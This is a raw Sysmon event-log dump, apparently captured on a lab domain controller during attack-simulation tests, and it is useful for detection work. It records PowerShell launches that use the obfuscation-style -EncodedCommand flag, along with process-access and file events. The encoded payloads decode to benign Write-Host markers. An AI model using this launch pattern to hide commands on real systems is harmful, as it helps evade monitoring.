|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49a232(wow64) 154100x80000000000000002235212Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.869{05ADC7E1-6D44-603E-61AA-00000000AD01}14396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Encod VwByAGkAdABlAC0ASABvAHMAdAAgAGIAYQA4ADMANwBmAGMANwAtAGQAZgBkADgALQA0ADEAMQBiAC0AOABiAGUAOAAtAGEANQBmAGUAYQBiADYAZQA1ADYAZABkAA==C:\Users\Administrator\Downloads\AtomicTestHarnesses\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002235211Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.840{05ADC7E1-6D44-603E-60AA-00000000AD01}12564ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235210Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.723{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D44-603E-60AA-00000000AD01}12564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235209Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.723{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D44-603E-60AA-00000000AD01}12564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235208Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.684{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D44-603E-60AA-00000000AD01}12564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235207Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.684{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D44-603E-60AA-00000000AD01}12564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002235206Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:20.668{05ADC7E1-6D44-603E-60AA-00000000AD01}12564\PSHost.132591775405787695.12564.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002235205Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.653{05ADC7E1-6D44-603E-60AA-00000000AD01}12564ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_e3xhdcrl.icj.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235204Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.653{05ADC7E1-6D44-603E-60AA-00000000AD01}12564ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_au5pokyt.fgp.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002235203Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.637{05ADC7E1-6D44-603E-60AA-00000000AD01}12564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_au5pokyt.fgp.ps12021-03-02 16:52:20.637 10341000x80000000000000002235202Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.606{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6D44-603E-60AA-00000000AD01}12564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235201Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.575{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6D44-603E-60AA-00000000AD01}12564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235200Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.575{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235199Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.575{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235198Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.575{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235197Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.575{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235196Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.575{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D44-603E-60AA-00000000AD01}12564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002235195Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.575{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6D44-603E-60AA-00000000AD01}12564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+700132a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49a232(wow64) 154100x80000000000000002235194Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.578{05ADC7E1-6D44-603E-60AA-00000000AD01}12564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Enco VwByAGkAdABlAC0ASABvAHMAdAAgADgAYwAyAGQAYQBjADcAZAAtADkAZQA0ADUALQA0AGUANgBhAC0AOQA5ADgAZgAtADgAMQBkADcAMQA0ADIANQBlAGUAZQA1AA==C:\Users\Administrator\Downloads\AtomicTestHarnesses\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002235193Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.543{05ADC7E1-6D44-603E-5FAA-00000000AD01}7416ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235192Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.450{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D44-603E-5FAA-00000000AD01}7416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235191Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.450{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D44-603E-5FAA-00000000AD01}7416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002235190Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.419{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CB2F4823AFF96B6C8471F388BFB693B5,SHA256=B7AC53DF188377924CC9A772DD728B2DDA378DAD2A6CEB33B7190787DC288FB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235189Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.403{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BE67E23448CE1598F4B5844F879BDEAC,SHA256=3025D79C6C7C4FA9F08B1EE457C73FB3611E3CBFDBB0E5E77E60E56B930D15A9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235188Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.403{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D44-603E-5FAA-00000000AD01}7416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235187Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.403{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D44-603E-5FAA-00000000AD01}7416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002235186Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:20.371{05ADC7E1-6D44-603E-5FAA-00000000AD01}7416\PSHost.132591775402854195.7416.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002235185Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.356{05ADC7E1-6D44-603E-5FAA-00000000AD01}7416ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_1wouth1f.kwu.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235184Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:20.356{05ADC7E1-6D44-603E-5FAA-00000000AD01}7416ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_1lvyo1nv.x4e.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002235183Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 